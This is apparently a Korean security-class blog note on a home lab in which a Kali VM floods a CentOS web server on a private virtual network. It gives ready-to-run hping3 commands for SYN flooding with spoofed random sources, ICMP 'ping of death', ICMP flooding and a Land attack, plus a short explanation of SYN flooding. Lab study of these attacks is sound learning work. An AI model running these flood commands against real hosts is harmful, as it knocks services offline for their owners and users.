dos 공격 혼자서 한특정곳에 공격함
네트워크 해킹
칼리 열기
network
vm08번으로
edit
virtual Network Editer
진입하려서 kali 리눅스, 서버 컴퓨터 (공격 타겟)
같은 네트워크 구성
두 개 다 브릿지 설정 or Vmnet8(NAT)고정
겹칠까봐 VMnet8번으로
Centos8, kali 동일 네트워크 브릿지 또는 vmnet8
hping3 —rand-source
Cenos8 에서
레드햇 계열 우분투 계열
systemctl start httpd // service apache2 start
Systemctl status httpd // service apche2 status
dnf install 파일 이름// apt-get install [파일이름
---------------------------------------------------------------------------------------------------------
칼리리눅스에서
centos 에서도 wireshark 키기
hping3 --rand-source 192.168.80.131 -p 80 -S |
치기 |
타겟ip
그뒤에 wire shark 로 확인
hping3 --rand-source --flood 192.168.80.131 -p -S |
|
랜덤으로 임의의 주소로 192.168.80.131 로 syn 패킷을보냄 |
씽크 플러딩은
TCP/IP 통신 프로토콜의 문제점을 악용한 서비스거부(Denial of Service) 공격의 하나로 공격자는 목적 호스트에 자신의 소스주 소를 존재하지않는 임의의 주소로 속인 후 연속적인 SYN 패킷을 보낸다. 그러면 목적 호스트는 SYN 패킷을 받은 후 응답(SYN,ACK )을 하게 되고 이 응답(SYN,ACK)의 응답(ACK)을 기다리게 된다. 하지만 소스주소가 속여서 보내졌으므로 응답은 오지않고 목적 호스트는 일정시간(timeout)동안 기다리다가 접속과정을 마치게 된다.
--------------------------------------------------------------------------------------------------
centos에서
systemctl start httpd
Systemctl status httpd
이거한뒤에
칼리에서
hping3 --rand-source --flood 192.168.80.131 -p 80 -S |
씽크 플러딩 공격
hping3 --rand-source --flood [타겟주소] -p 80 -S
ping of death공격
hping3 --icmp --rand-source --flood 192.168.80.131 -d 50000
타겟주소 패킷크기
icmp flooding
hping3 -a 192.168.80.131 192.168.80.132 --icmp --flood
-a[아이피] IP spoofing(IP변조)
Land ATTACK
타겟(centos) 192.168.80.131
공격자(kalilinux) 192.168.80.132
타겟 ip가 공격자ip 로 변환하여 공격하는방법
hping3 -a 192.168.80.131 192.168.80.131 --icmp --flood
-a[아이피]
hping3 -a [변조시킬IP] [공격대상IP] --icmp --flood
setuid 프로세스가 실행중에만 소유자(root)의 권한으로 프로세스를 실행
exe 단독으로실행
dll 공통으로 쓰는 모듈들을 저장힘.
'공격기법 및 탐지' 카테고리의 다른 글
tcp half open scan (0) | 2021.01.04 |
---|---|
tcp syn(full. open. connect) scan (0) | 2021.01.04 |
네트워크 - 중요이론 (0) | 2021.01.04 |
네트워크 arp 스푸핑 (0) | 2020.11.30 |
네트워크 dns 스푸핑 (0) | 2020.11.30 |